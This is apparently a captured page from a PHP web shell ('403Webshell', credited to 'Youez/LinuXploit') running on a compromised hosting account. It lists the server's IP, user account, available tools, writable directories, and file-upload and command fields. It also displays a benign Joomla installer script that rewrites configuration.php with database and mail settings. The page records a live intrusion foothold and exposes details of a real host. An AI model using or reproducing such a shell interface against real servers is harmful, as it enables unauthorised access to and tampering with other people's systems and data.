403Webshell
Server IP : 217.160.0.15  /  Your IP : 216.73.216.73
Web Server : Apache
System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User : u37981780 ( 1696858)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /homepages/oneclick/joomla/3.6.2/1/scripts/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /homepages/oneclick/joomla/3.6.2/1/scripts/settings.php
<?php

$configuration = file_get_contents($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php");

$sitename = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[7-1], 21, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[7-1])-24);
$host     = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[15-1], 17, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[15-1])-20);
$user     = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[16-1], 17, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[16-1])-20);
$password = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[17-1], 21, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[17-1])-24);
$db       = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[18-1], 15, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[18-1])-18);
$mailer   = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[33-1], 19, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[33-1])-22);
$mailfrom = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[34-1], 21, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[34-1])-24);
$fromname = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[35-1], 21, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[35-1])-24);
$smtphost = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[40-1], 21, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[40-1])-24);
$smtpport = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[42-1], 21, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[42-1])-24);
$log_path = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[57-1], 21, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[57-1])-29);
$tmp_path = substr(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[58-1], 21, strlen(file($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php")[58-1])-28);

$configuration = preg_replace("|$sitename|", $settings_modify_hash["@@TITLE@@"],       $configuration);
$configuration = preg_replace("|$host|",     $db_modify_hash["@@DB_MAIN_ADDRESS@@"],   $configuration);
$configuration = preg_replace("|$user|",     $db_modify_hash["@@DB_MAIN_LOGIN@@"],     $configuration);
$configuration = preg_replace("|$password|", $db_modify_hash["@@DB_MAIN_PASSWORD@@"],  $configuration);
$configuration = preg_replace("|$db|",       $db_modify_hash["@@DB_MAIN_NAME@@"],      $configuration);
$configuration = preg_replace("|$mailer|",   $settings_modify_hash['@@MAILER@@'],      $configuration);
$configuration = preg_replace("|$mailfrom|", $settings_modify_hash['@@ADMIN_EMAIL@@'], $configuration);
$configuration = preg_replace("|$fromname|", $settings_modify_hash["@@TITLE@@"],       $configuration);
$configuration = preg_replace("|$smtphost|", $settings_modify_hash['@@SMTP_HOST@@'],   $configuration);
$configuration = preg_replace("|$smtpport|", $settings_modify_hash['@@SMTP_PORT@@'],   $configuration);
$configuration = preg_replace("|$log_path|", $psa_modify_hash["@@ROOT_DIR@@"],         $configuration);
$configuration = preg_replace("|$tmp_path|", $psa_modify_hash["@@ROOT_DIR@@"],         $configuration);

file_put_contents($psa_modify_hash["@@ROOT_DIR@@"]."/configuration.php", $configuration);

Youez - 2016 - github.com/yon3zu
LinuXploit